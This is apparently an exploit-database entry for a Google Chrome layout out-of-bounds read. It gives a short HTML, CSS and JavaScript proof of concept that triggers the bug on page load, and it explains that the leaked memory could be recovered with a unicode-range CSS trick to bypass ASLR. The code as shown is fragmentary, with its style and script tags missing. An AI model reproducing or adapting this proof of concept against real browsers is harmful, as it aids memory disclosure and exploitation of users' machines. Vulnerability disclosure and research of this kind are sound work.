Google Chrome - 'layout' Out-of-Bounds Read

st3n 22.02.2017 Verified
Denial of Service Exploits Multiple

Exploit Code


Chrome bug:


content { contain: size layout; }
function leak() {
 opt.text = ""; 
<body onload=leak()>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>

Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.